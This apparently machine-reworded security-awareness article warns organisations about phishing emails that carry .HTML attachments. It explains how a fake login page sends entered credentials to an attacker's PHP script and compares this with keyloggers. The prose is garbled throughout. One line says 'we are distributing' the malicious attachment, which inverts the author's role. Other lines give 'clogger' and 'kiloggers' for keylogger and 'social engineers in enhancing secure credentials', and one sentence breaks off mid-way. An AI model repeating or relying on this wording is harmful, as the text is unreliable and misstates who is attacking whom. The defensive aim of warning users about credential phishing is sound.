In the last six to nine months, .DOC and .JS file attachments have dominated the news surrounding the rise in phishing attacks. The reasons are clear and understandable: Those two file types (typically packaged in .ZIP files) are commonly used to deliver extremely dangerous ransomware and banker Trojans. Employees in your organization should be wary of any other file type, however, which we are distributing as a malicious attachment: .HTML files.
The page asks the user to enter their username and password to view the document file. To entice a user to use an email account, he added pictures from popular email providers such as Gmail, Outlook and Yahoo Mail.
When a victim enters their username / password and submits the form, the credentials are passed to the PHP script configured by the attacker. Typically, this script is configured to send credentials to an email account controlled by the attacker.
Keyloggers are still commonly used by BEC actors to retrieve accounts of their victims and are very effective. However, distributing an executable file via email can be difficult nowadays as anti-spam rules will mark these messages quickly. On the other hand, there is no immediate threat to the HTML file – unless the file has been verified as a phishing page.
A phishing page can be easily coded and deployed, unlike a clogger that requires some coding knowledge. A phishing page will run on any platform, as they only need a browser, as opposed to kiloggers, which will depend on the builder.
One disadvantage of phishing pages on Keyloggers is how they recover passwords from their victims. For a phishing page, a user is required to enter their credentials in a form and send it to them. A keylogger only needs to be executed and will then be running in the background.
Although your users and employees may not recognize the potential threat of .HTML attachments, this does not mean that they are not familiar with them. HTML attachments are commonly used by banks and other financial institutions to secure documents and messages, as well as for users to conduct banking business in a secure environment.
Many of your users may have seen such emails (Cisco registered envelope service). . Notice the HTML attachment.
If your organization is in the financial services industry, or if your employees regularly interact with financial institutions during their jobs, then it is likely that your employees may see. HTML attachments just as routine and non-threatening. And there is danger.
Let’s take a look at the three most common ways that users and employees are social engineers in enhancing secure credentials.